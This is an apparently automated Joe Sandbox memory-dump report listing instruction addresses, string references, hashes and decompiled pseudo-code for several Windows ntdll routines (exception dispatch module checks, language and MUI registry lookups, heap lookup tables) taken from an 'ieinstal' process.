0x1f029ea5
0x1f029ea5
0x1efe0b13
0x1efe0bd3
0x1efe0be3
0x1efe0be3
0x1efe0be5
0x00000000
0x00000000
0x1efe0bd8
0x1efe0bdb
0x1efe0be0
0x1efe0be0
0x00000000
0x1efe0b19
0x1efe0b19
0x1efe0b27
0x1efe0b2a
0x1efe0b36
0x1efe0c0d
0x1efe0c15
0x1efe0c20
0x1efe0c21
0x1efe0c23
0x1efe0c25
0x1efe0c25
0x1efe0b3e
0x1efe0b40
0x1efe0b43
0x1efe0b46
0x1efe0b4b
0x1efe0bc2
0x1efe0bc2
0x1efe0bc7
0x1efe0bd2
0x1efe0b4d
0x1efe0b50
0x1efe0b56
0x1efe0b59
0x1efe0b59
0x1efe0b5e
0x1f029eb1
0x1f029eb3
0x1f029eb8
0x1f029ebb
0x1f029ebd
0x00000000
0x00000000
0x1f029ec3
0x1efe0b66
0x1efe0b69
0x1efe0b70
0x1efe0bec
0x1efe0bf3
0x1efe0bfa
0x1efe0bfc
0x1efe0c02
0x1efe0c04
0x1efe0c04
0x1efe0bf3
0x1efe0b72
0x1efe0b76
0x1efe0b78
0x1efe0b7b
0x1efe0b7f
0x1efe0b80
0x1efe0b8a
0x1f029ec8
0x1f029ecb
0x1f029ecb
0x1f029ece
0x1f029ece
0x1f029ed1
0x1f029ed4
0x1f029ed4
0x1f029edc
0x1f029ede
0x1f029ee5
0x1f029ef1
0x1f029ef1
0x1f029ee7
0x1f029ee7
0x1f029eed
0x1f029eed
0x1f029ef4
0x1f029f0a
0x1f029f0c
0x1f029f0f
0x1f029f11
0x1f029f4e
0x1f029f54
0x1f029f56
0x1f029fbb
0x1f029fbe
0x1f029fc1
0x1f029fc4
0x1f029fc4
0x1f029fc7
0x1f029fca
0x1f029fca
0x1f029fd0
0x1f029fd0
0x1f029fd3
0x1f029fdd
0x1f029fe2
0x1f029fe5
0x1f029fe8
0x1f029ff0
0x00000000
0x1f029ff0
0x1f029f58
0x1f029f5d
0x1f029f5d
0x1f029f62
0x1f029f65
0x1f029f6a
0x1f029f6d
0x1f029f70
0x1f029f72
0x1f029f75
0x1f029f78
0x1f029f78
0x1f029f7b
0x1f029f7e
0x1f029f7e
0x1f029f93
0x1f029f9a
0x1f029f9f
0x1f029fb4
0x00000000
0x1f029f13
0x1f029f13
0x1f029f18
0x1f029f1a
0x1f029f1c
0x1f029f21
0x1f029f23
0x1f029f24
0x1f029f29
0x1f029f2e
0x1f029f33
0x1f029f38
0x1f029f3d
0x1f029f3d
0x1f029f40
0x1f029f42
0x1f029f48
0x1f029f48
0x00000000
0x1f029f42
0x1f029f11
0x1efe0b8a
0x1efe0b90
0x1efe0b96
0x1efe0ba1
0x1efe0baa
0x1efe0bb2
0x1efe0bb5
0x1efe0bb8
0x1efe0bbb
0x1efe0bbf
0x00000000
0x1efe0bbf
0x1efe0b4b

Strings

LdrpCheckModule, xrefs: 1F029F24
minkernel\ntdll\ldrinit.c, xrefs: 1F029F2E
Failed to allocated memory for shimmed module list, xrefs: 1F029F1C

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: f8839496b0f0dfe7f85357ff830eb7c9fa32f898b6f0917857f87973d25d5b44
Instruction ID: 26feade57313059111efaa81a824bb8862c93876fa86fdd0a6a401acfb9a632b
Opcode Fuzzy Hash: f8839496b0f0dfe7f85357ff830eb7c9fa32f898b6f0917857f87973d25d5b44
Instruction Fuzzy Hash: 2E71E079A002459FDB04DF68C8A0AAEB7F1FF44308F55466EEC02EB650E735BA41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF8FBC Relevance: 3.9, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1EFF8FBC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v16;
				intOrPtr _v84;
				char _v92;
				signed char _v96;
				signed char _v100;
				signed char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				signed char _v120;
				intOrPtr _v124;
				char _v125;
				intOrPtr _v128;
				void* _v132;
				void* _v133;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				signed int _t91;
				signed char _t94;
				intOrPtr _t103;
				signed int _t104;
				signed char _t109;
				void* _t120;
				char* _t127;
				signed char _t128;
				intOrPtr _t129;
				signed char _t131;
				signed char _t144;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				signed char _t152;
				intOrPtr* _t155;
				void* _t156;
				signed int _t157;
				signed int _t159;

				_t159 = (_t157 & 0xfffffff8) - 0x7c;
				_t87 =  *0x1f0bb370 ^ _t159;
				_v8 =  *0x1f0bb370 ^ _t159;
				_t139 = _a8;
				_t155 = _a4;
				_t119 = 0;
				_push(_t148);
				_v124 = _a8;
				_v125 = 0;
				if( *_t155 == 0xc0000006 || E1EFF931B(_t87,  *((intOrPtr*)(_t155 + 0xc))) == 0) {
					if(( *( *[fs:0x30] + 0x68) & 0x00800000) != 0) {
						_v125 = 1;
						E1F078BBD(_t155, _t139);
					}
					_t90 = E1EFE0130();
					_t149 = _v124;
					if(_t90 != 0) {
						_t91 = E1EFF9325(_t119,  *((intOrPtr*)(_t149 + 0xc4)), _t149, _t155, __eflags);
						__eflags = _t91;
						if(_t91 != 0) {
							goto L4;
						} else {
							_t131 = 0xd;
							asm("int 0x29");
							goto L25;
						}
					} else {
						L4:
						if(E1EFFCCD1(_t155, _t149, _t119) != 0) {
							L20:
							_t119 = 1;
							L21:
							_t139 = _v124;
							E1EFFCCD1(_t155, _v124, 1);
							_t94 = _t119;
							goto L22;
						}
						_t127 =  &_v112;
						E1EFF92EF(_t127,  &_v108);
						_t151 =  *[fs:0x0];
						_push(_t119);
						_push(4);
						_push( &_v116);
						_push(0x22);
						_push(0xffffffff);
						_v120 =  *[fs:0x0];
						_v116 = _t119;
						if(E1F002B20() < 0) {
							_v116 = _t119;
						}
						if((_v116 & 0x00000040) != 0) {
							L8:
							_t128 = _v120;
							_v104 = _t119;
							L9:
							if(_t128 == 0xffffffff) {
								goto L21;
							}
							if(_t128 < _v112 || _t128 + 8 > _v108 || (_t128 & 0x00000003) != 0) {
								L29:
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								goto L21;
							} else {
								_t129 =  *((intOrPtr*)(_t128 + 4));
								if(_t129 < _v108) {
									__eflags = _v112 - _t129;
									if(_v112 > _t129) {
										goto L14;
									}
									goto L29;
								}
								L14:
								if(E1EFF9193(_t129, _v116, _v124) == 0) {
									goto L29;
								}
								_t152 = _v120;
								_v100 = _t119;
								if(_v125 != _t119) {
									_v108 = E1F078C65(_t155, _v124, _t129,  *((intOrPtr*)(_t152 + 4)));
								}
								_t103 = E1F018860(_t155, _t152, _v124,  &_v96,  *((intOrPtr*)(_t152 + 4)));
								_t131 = _v120;
								if(_t131 != 0) {
									 *((intOrPtr*)(_t131 + 0x320)) = _t103;
								}
								_t144 = _v104;
								if(_t144 == _t152) {
									 *(_t155 + 4) =  *(_t155 + 4) & 0xffffffef;
									_t144 = _t119;
									_v104 = _t144;
								}
								_t91 = _t103 - _t119;
								if(_t91 != 0) {
									L25:
									_t104 = _t91 - 1;
									__eflags = _t104;
									if(_t104 != 0) {
										__eflags = _t104 == 1;
										if(_t104 == 1) {
											 *(_t155 + 4) =  *(_t155 + 4) | 0x00000010;
											__eflags = _v96 - _t144;
											if(_v96 > _t144) {
												_v104 = _v96;
											}
										} else {
											_v92 = 0xc0000026;
											_push( &_v92);
											 *((intOrPtr*)(_t159 + 0x38)) = 1;
											_v84 = _t155;
											 *(_t159 + 0x44) = _t119;
											L1F018A60(_t131, _t144);
										}
										goto L27;
									}
									goto L26;
								} else {
									_t109 = _t91 + 1;
									if(( *(_t155 + 4) & _t109) != 0) {
										 *(_t159 + 0x34) = _t109;
										_push( &_v92);
										_v92 = 0xc0000025;
										_v84 = _t155;
										 *(_t159 + 0x44) = _t119;
										L1F018A60(_t131, _t144);
										L26:
										__eflags =  *(_t155 + 4) & 0x00000008;
										if(( *(_t155 + 4) & 0x00000008) != 0) {
											goto L21;
										}
										L27:
										_t128 =  *_v120;
										_v120 = _t128;
										goto L9;
									}
									goto L20;
								}
							}
						} else {
							_push(_t127);
							if(E1EFF9284(_t151, _v112, _v108) == 0) {
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								__eflags =  *0x1f0b38bc - 2;
								if( *0x1f0b38bc != 2) {
									goto L21;
								}
								asm("lock cmpxchg [edx], ecx");
								__eflags = 0;
								if(0 == 0) {
									E1F0767F9(_t119, _t155, _v128, 0);
								}
								 *(_t155 + 4) =  *(_t155 + 4) & 0xfffffff7;
							}
							goto L8;
						}
					}
				} else {
					E1F073A55(0,  *((intOrPtr*)(_t139 + 0xac)), _t139, _t148);
					 *((intOrPtr*)(_v124 + 0xb8)) = E1F0767F3();
					_t94 = 1;
					L22:
					_pop(_t150);
					_pop(_t156);
					_pop(_t120);
					return E1F004B50(_t94, _t120, _v8 ^ _t159, _t139, _t150, _t156);
				}
			}

0x1eff8fc4
0x1eff8fcc
0x1eff8fce
0x1eff8fd2
0x1eff8fd7
0x1eff8fda
0x1eff8fdc
0x1eff8fdd
0x1eff8fe1
0x1eff8feb
0x1eff900a
0x1f035a79
0x1f035a7e
0x1f035a7e
0x1eff9010
0x1eff9015
0x1eff901b
0x1eff9153
0x1eff9158
0x1eff915a
0x00000000
0x1eff9160
0x1eff9162
0x1eff9163
0x00000000
0x1eff9163
0x1eff9021
0x1eff9021
0x1eff902d
0x1eff9125
0x1eff9125
0x1eff9127
0x1eff9127
0x1eff912f
0x1eff9134
0x00000000
0x1eff9134
0x1eff9037
0x1eff903b
0x1eff9040
0x1eff904b
0x1eff904c
0x1eff904e
0x1eff904f
0x1eff9051
0x1eff9053
0x1eff9057
0x1eff9062
0x1f035a88
0x1f035a88
0x1eff906d
0x1eff9087
0x1eff9087
0x1eff908b
0x1eff908f
0x1eff9092
0x00000000
0x00000000
0x1eff909c
0x1eff918d
0x1eff918d
0x00000000
0x1eff90b8
0x1eff90b8
0x1eff90bf
0x1eff9183
0x1eff9187
0x00000000
0x00000000
0x00000000
0x1eff9187
0x1eff90c5
0x1eff90d4
0x00000000
0x00000000
0x1eff90da
0x1eff90de
0x1eff90e6
0x1f035ad7
0x1f035ad7
0x1eff90fa
0x1eff90ff
0x1eff9105
0x1f035ae0
0x1f035ae0
0x1eff910b
0x1eff9111
0x1f035aeb
0x1f035aef
0x1f035af1
0x1f035af1
0x1eff9117
0x1eff9119
0x1eff9165
0x1eff9165
0x1eff9165
0x1eff9168
0x1f035afa
0x1f035afd
0x1f035b26
0x1f035b2a
0x1f035b2e
0x1f035b38
0x1f035b38
0x1f035aff
0x1f035b03
0x1f035b0b
0x1f035b0c
0x1f035b14
0x1f035b18
0x1f035b1c
0x1f035b1c
0x00000000
0x1f035afd
0x00000000
0x1eff911b
0x1eff911b
0x1eff911f
0x1f035b41
0x1f035b49
0x1f035b4a
0x1f035b52
0x1f035b56
0x1f035b5a
0x1eff916e
0x1eff916e
0x1eff9172
0x00000000
0x00000000
0x1eff9174
0x1eff9178
0x1eff917a
0x00000000
0x1eff917a
0x00000000
0x1eff911f
0x1eff9119
0x1eff906f
0x1eff9073
0x1eff9081
0x1f035a91
0x1f035a95
0x1f035a9c
0x00000000
0x00000000
0x1f035aac
0x1f035ab0
0x1f035ab2
0x1f035aba
0x1f035aba
0x1f035abf
0x1f035abf
0x00000000
0x1eff9081
0x1eff906d
0x1f035a56
0x1f035a5c
0x1f035a6a
0x1f035a70
0x1eff9136
0x1eff913d
0x1eff913e
0x1eff913f
0x1eff914a
0x1eff914a

Strings

@, xrefs: 1EFF9068
%, xrefs: 1F035B4A
&, xrefs: 1F035B03

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 484ed03608c0bf980586f7799fbc85cd7ef98475db33de6d547de02154443c73
Instruction ID: 60ad7aacb77ea04147b709fdc06716ded45c4d565c95364a025edb6dde8dfe4d
Opcode Fuzzy Hash: 484ed03608c0bf980586f7799fbc85cd7ef98475db33de6d547de02154443c73
Instruction Fuzzy Hash: 2871C376608382DFC300DF60C5A0A5BBBE6BFC5714F184B2DE89547260D732E909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBCC68 Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1EFBCC68(void* __ecx, short* __edx, short* _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t58;
				signed int _t73;
				signed short* _t74;
				signed int _t75;
				signed short* _t77;
				signed int _t82;
				short* _t92;
				signed short* _t93;
				short* _t95;
				void* _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t79 = __ecx;
				_t100 = (_t98 & 0xfffffff8) - 0x34;
				_t95 = __edx;
				_v44 = __edx;
				_t77 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t96 = 0xc000000d;
				} else {
					_t92 = _a4;
					if(_t92 == 0) {
						goto L28;
					}
					_t77 = E1EFBD818(__ecx, 0xac);
					if(_t77 == 0) {
						_t96 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1F002A80();
						}
						if(_t77 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t77);
						}
						return _t96;
					}
					E1F008F40(_t77, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t101 = _t100 + 0xc;
					 *_t95 = 0;
					 *_t92 = 0;
					E1F005050(_t79,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v32 = 0;
					_push( &_v36);
					_push(0x20019);
					_v24 = 0x40;
					_push( &_v64);
					_v20 = 0;
					_v16 = 0;
					_t96 = E1F002AB0();
					if(_t96 < 0) {
						goto L6;
					}
					E1F005050(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t96 = E1EFBD64A(_v64,  &_v44,  &_v56, _t77,  &_v48);
					if(_t96 >= 0) {
						if(_v52 != 1) {
							L17:
							_t96 = 0xc0000001;
							goto L6;
						}
						_t58 =  *_t77 & 0x0000ffff;
						_t93 = _t77;
						_t82 = _t58;
						if(_t58 == 0) {
							L19:
							if(_t82 == 0) {
								L23:
								E1F005050(_t82, _t101 + 0x24, _t77);
								if(E1EFE56E0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t83 = _v48;
								 *_v48 = _v56;
								if( *_t93 != 0) {
									E1F005050(_t83, _t101 + 0x24, _t93);
									if(E1EFE56E0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t96 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t82 = _t82 & 0x0000ffff;
							while(_t82 == 0x20) {
								_t93 =  &(_t93[1]);
								_t73 =  *_t93 & 0x0000ffff;
								_t82 = _t73;
								if(_t73 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t26 =  &(_t93[1]); // 0x2
							_t74 = _t26;
							if(_t82 == 0x2c) {
								break;
							}
							_t93 = _t74;
							_t75 =  *_t93 & 0x0000ffff;
							_t82 = _t75;
							if(_t75 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t93 = 0;
						_t93 = _t74;
						_t82 =  *_t74 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x1efbcc68
0x1efbcc70
0x1efbcc77
0x1efbcc79
0x1efbcc7d
0x1efbcc7f
0x1efbcc86
0x1f01a26b
0x1f01a26b
0x1efbcc94
0x1efbcc94
0x1efbcc99
0x00000000
0x00000000
0x1efbcca9
0x1efbccad
0x1f01a192
0x1efbcd59
0x1efbcd5e
0x1efbcd60
0x1efbcd64
0x1efbcd64
0x1efbcd6b
0x1efbcd7a
0x1efbcd7a
0x1efbcd87
0x1efbcd87
0x1efbccbb
0x1efbccc0
0x1efbccc5
0x1efbccca
0x1efbcccd
0x1efbccda
0x1efbcce3
0x1efbcceb
0x1efbccf5
0x1efbccf9
0x1efbccfa
0x1efbcd03
0x1efbcd0b
0x1efbcd0c
0x1efbcd10
0x1efbcd19
0x1efbcd1d
0x00000000
0x00000000
0x1efbcd29
0x1efbcd2e
0x1efbcd3d
0x1efbcd4f
0x1efbcd53
0x1f01a1a1
0x1f01a1c6
0x1f01a1c6
0x00000000
0x1f01a1c6
0x1f01a1a3
0x1f01a1a6
0x1f01a1a8
0x1f01a1ad
0x1f01a1da
0x1f01a1dd
0x1f01a1f5
0x1f01a1fb
0x1f01a211
0x00000000
0x00000000
0x1f01a213
0x1f01a21c
0x1f01a224
0x1f01a230
0x1f01a246
0x1f01a263
0x1f01a248
0x1f01a24e
0x1f01a253
0x1f01a253
0x1f01a246
0x00000000
0x1f01a224
0x1f01a1df
0x1f01a1e2
0x1f01a1e8
0x1f01a1eb
0x1f01a1ee
0x1f01a1f3
0x00000000
0x00000000
0x00000000
0x1f01a1f3
0x00000000
0x00000000
0x00000000
0x00000000
0x1f01a1af
0x1f01a1af
0x1f01a1af
0x1f01a1af
0x1f01a1b6
0x00000000
0x00000000
0x1f01a1b8
0x1f01a1ba
0x1f01a1bd
0x1f01a1c2
0x00000000
0x00000000
0x00000000
0x1f01a1c4
0x1f01a1d2
0x1f01a1d5
0x1f01a1d7
0x00000000
0x1f01a1d7
0x1efbcd53

Strings

@, xrefs: 1EFBCD03
InstallLanguageFallback, xrefs: 1EFBCD1F
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1EFBCCD4

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: b7ef7a77e8803ed6d9e2af5fbd02cf6b87b882c68cffa84780d03bf7c094d421
Instruction ID: 0c03f643b4220c1841a22ee19b5c1feeee83e309e17534c17d2cdaad9b6717f3
Opcode Fuzzy Hash: b7ef7a77e8803ed6d9e2af5fbd02cf6b87b882c68cffa84780d03bf7c094d421
Instruction Fuzzy Hash: FE51E67A5083419BD700DF65C850BABB3E8BF88754F010A2EFD95E7250FB31E94487A2

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC1A24 Relevance: 3.9, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1EFC1A24(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				void* _t68;
				signed int _t69;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t83;
				intOrPtr* _t99;
				intOrPtr _t100;
				void* _t101;
				signed int _t115;
				signed int* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t100 = __ecx;
				_t99 = __edx;
				_v12 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t65 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14));
					__eflags =  *(__edx + 8);
					_t101 = _t65 * 8 - 8;
					if(__eflags == 0) {
						_t101 = _t65 * 4 - 4;
					}
					 *(_t101 +  *((intOrPtr*)(_t99 + 0x20))) =  *(_t101 +  *((intOrPtr*)(_t99 + 0x20))) & 0x00000000;
					asm("btr eax, esi");
					_t100 = _v12;
				}
				_t68 = _t100 + 0xc0;
				_t127 =  *((intOrPtr*)(_t68 + 4));
				while(1) {
					L2:
					_v8 = _t127;
					if(_t68 == _t127) {
						break;
					}
					_t122 = _t127 - 8;
					if( *((intOrPtr*)(_t100 + 0x4c)) != 0) {
						 *_t122 =  *_t122 ^  *(_t100 + 0x50);
						if(_t122[0] != (_t122[0] ^ _t122[0] ^  *_t122)) {
							_push(_t100);
							E1F07D646(_t99, _t100, _t122, _t122, _t127, __eflags);
							_t100 = _v12;
						}
					}
					_t115 =  *_t122 & 0x0000ffff;
					_t69 = _t99;
					_t135 = _t115 -  *((intOrPtr*)(_t99 + 4));
					while(1) {
						_v20 = _t69;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t69;
						_v16 = _t130;
						_t127 = _v8;
						if(_t130 != 0) {
							_t69 = _v16;
							__eflags = _t115 -  *((intOrPtr*)(_t69 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t69 + 4)) - 1;
						L9:
						if( *_t99 != 0) {
							_t70 =  *((intOrPtr*)(_t99 + 4));
							__eflags = _t115 - _t70;
							_t71 = _t70 - 1;
							__eflags = _t71;
							if(_t71 < 0) {
								_t71 = _t115;
							}
							E1EFD036A(_t100, _t99, 1, _t127, _t71, _t115);
						}
						E1EFC1B5D(_v12, _v20, 1, _t127, _v16,  *_t122 & 0x0000ffff);
						if( *0x1f0b6960 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0xc);
								if( *(_t83 + 0xc) == 0) {
									_push("HEAP: ");
									E1EFBB910();
								} else {
									E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E1EFBB910();
								__eflags =  *0x1f0b5da8;
								if(__eflags == 0) {
									__eflags = 1;
									E1F07FC95(_t99, 1, _t122, 1);
								}
							}
							_t127 = _v8;
						}
						_t100 = _v12;
						if( *((intOrPtr*)(_t100 + 0x4c)) != 0) {
							_t122[0] = _t122[0] ^ _t122[0] ^  *_t122;
							 *_t122 =  *_t122 ^  *(_t100 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t68 = _t100 + 0xc0;
						goto L2;
					}
					_v16 = _t115;
					goto L9;
				}
				return _t68;
			}

0x1efc1a24
0x1efc1a2d
0x1efc1a2f
0x1efc1a33
0x1efc1a3d
0x1efc1b11
0x1efc1b14
0x1efc1b18
0x1efc1b1f
0x1efc1b21
0x1efc1b21
0x1efc1b2b
0x1efc1b44
0x1efc1b4a
0x1efc1b4a
0x1efc1a43
0x1efc1a49
0x1efc1a4c
0x1efc1a4c
0x1efc1a4c
0x1efc1a51
0x00000000
0x00000000
0x1efc1a5b
0x1efc1a5e
0x1efc1a63
0x1efc1a70
0x1f01f908
0x1f01f90b
0x1f01f910
0x1f01f910
0x1efc1a70
0x1efc1a76
0x1efc1a79
0x1efc1a7b
0x1efc1a7e
0x1efc1a7e
0x1efc1a81
0x00000000
0x00000000
0x1efc1a87
0x1efc1a8b
0x1efc1a8e
0x1efc1a91
0x1efc1b52
0x1efc1b55
0x00000000
0x1efc1b55
0x1efc1a9b
0x1efc1a9e
0x1efc1aa1
0x1efc1af1
0x1efc1af4
0x1efc1af6
0x1efc1af6
0x1efc1af7
0x1efc1af9
0x1efc1af9
0x1efc1b02
0x1efc1b02
0x1efc1ab3
0x1efc1abf
0x1f01f931
0x1f01f934
0x1f01f936
0x1f01f93c
0x1f01f940
0x1f01f95f
0x1f01f964
0x1f01f942
0x1f01f957
0x1f01f95c
0x1f01f96a
0x1f01f96f
0x1f01f974
0x1f01f97c
0x1f01f980
0x1f01f981
0x1f01f981
0x1f01f97c
0x1f01f986
0x1f01f986
0x1efc1ac5
0x1efc1acc
0x1efc1ad6
0x1efc1adc
0x1efc1adc
0x1efc1ade
0x1efc1ae1
0x00000000
0x1efc1ae1
0x1efc1b09
0x00000000
0x1efc1b09
0x1efc1af0

Strings

HEAP: , xrefs: 1F01F95F
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1F01F96A
HEAP[%wZ]: , xrefs: 1F01F952

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: 3f3c4cbaa3910d8c48c6b49ab377c81a582072c4d174076bfdbc4851cab41ea6
Instruction ID: cadfa7f18e15057dafb0c69aa408457cd33d723d1404d0609b2c8a04a68711ea
Opcode Fuzzy Hash: 3f3c4cbaa3910d8c48c6b49ab377c81a582072c4d174076bfdbc4851cab41ea6
Instruction Fuzzy Hash: F651BE35A04156EFDB04DF64C4A0AAABBF2FF45310F258299E8449F246D731ED62CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F07BD08 Relevance: 3.9, Strings: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1F07BD08(intOrPtr __ecx, void* __edx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t64;
				void* _t68;
				char* _t75;

				_v8 = _v8 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t64 = 0;
				_v20 = __ecx;
				_v12 = 7;
				if(__ecx == 0) {
					L14:
					_t76 = 0xc000000d;
				} else {
					_t75 = _a4;
					if(_t75 == 0 || _a8 == 0) {
						goto L14;
					} else {
						E1F005050(__ecx,  &_v28, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
						_v52 = 0x18;
						_v44 =  &_v28;
						_v48 = 0;
						_push( &_v52);
						_push(0x20019);
						_v40 = 0x40;
						_push( &_v8);
						_v36 = 0;
						_v32 = 0;
						if(E1F002AB0() >= 0) {
							E1F005050(0,  &_v28, L"PreferredUILanguages");
							_push(0);
							_t68 = E1EFBD64A(_v8,  &_v28,  &_v12, 0,  &_v16);
							_t76 = 0xc0000034;
							if(_t68 == 0xc0000034) {
								goto L4;
							} else {
								_t54 = _v16;
								if(_v16 == 0) {
									goto L4;
								} else {
									if(_t68 == 0x80000005) {
										_t64 = E1EFD5D90(_t68,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t54 + 2);
										if(_t64 != 0) {
											_push(_t68);
											_t76 = E1EFBD64A(_v8,  &_v28,  &_v12, _t64,  &_v16);
											if(_t76 >= 0) {
												if(_v12 == 7 || _v12 == 1) {
													 *_t75 = 0;
													_t76 = L1EFE4CA6(_v20, _t64, _v16 >> 1, 8, 3, 1, _a8);
												} else {
													goto L4;
												}
											}
										} else {
											_t76 = 0xffffffffc0000017;
										}
									}
								}
							}
						} else {
							L4:
							_t76 = 0;
							 *_t75 = 1;
						}
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					E1F002A80();
				}
				if(_t64 != 0) {
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t64);
				}
				return _t76;
			}

0x1f07bd10
0x1f07bd16
0x1f07bd1c
0x1f07bd1e
0x1f07bd21
0x1f07bd2b
0x1f07be3a
0x1f07be3a
0x1f07bd31
0x1f07bd31
0x1f07bd36
0x00000000
0x1f07bd45
0x1f07bd4e
0x1f07bd56
0x1f07bd5d
0x1f07bd65
0x1f07bd68
0x1f07bd69
0x1f07bd71
0x1f07bd78
0x1f07bd79
0x1f07bd7c
0x1f07bd86
0x1f07bd9b
0x1f07bda0
0x1f07bdb6
0x1f07bdb8
0x1f07bdbf
0x00000000
0x1f07bdc1
0x1f07bdc1
0x1f07bdc6
